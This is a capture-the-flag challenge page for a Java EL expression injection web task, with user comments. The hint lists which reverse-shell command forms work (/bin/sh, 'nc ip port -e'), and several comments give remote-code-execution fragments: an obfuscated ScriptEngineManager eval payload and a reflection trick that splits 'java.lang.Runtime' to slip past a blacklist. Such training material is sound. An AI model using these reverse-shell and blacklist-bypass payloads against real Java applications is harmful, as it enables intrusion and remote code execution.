列表

详情

Java EL表达式注入

平台   WEB  

题目作者: 云牧青

一  血: ‌‌‌‌‌广告位招租

一血奖励: 10金币

解  决: 47

提  示: /bin/bash: X ; /bin/sh √ ; /dev/tcp X ; nc -e ip port X ; nc ip port -e √ ;

去做题

blackjack009 @ 2023-12-07 23:21:32 👍0

new javax.script.ScriptEngineManager().getEngineByName(new String(new byte[]{106,115})).eval(new String(new byte[]{106...........}));

jack12138 @ 2023-06-07 23:21:32 👍0

利用Java反射机制实现RCE,参考:http://www.hackdig.com/08/hack-459909.htm,题中用''.getClass()替代了Class,黑名单可利用字符串拼接绕过,如''.getClass().forName('java.lang.Run'+'time')

jack12138 @ 2023-06-07 23:21:32 👍0

没做出来,记录一下,应该跟 MVEL.eval 有关系?没试出来

chips @ 2023-06-07 23:21:32 👍0

好难 金币-5

笨笨笨蛋 @ 2023-06-07 23:21:32 👍0

金币-5 寄了,求一个思路

杠上开花 @ 2023-06-07 23:21:32 👍0

黑名单把字符串拆开即可

bigcaicai @ 2022-06-07 23:21:32 👍0

求大佬指导一下,在本地测试时,mvel不能赋值,导致无法使用fastjson的那个利用链,要怎么绕过黑名单

树木有点绿 @ 2022-06-07 23:21:32 👍1

好难 金币-5

blueyst @ 2022-06-07 23:21:32 👍3

H-ui.admin v3.1 金币-5记仇ing

云牧青 @ 2022-06-07 23:21:32 👍0

前端随便找的,大佬加油?

© 2025 ctf.bugku.com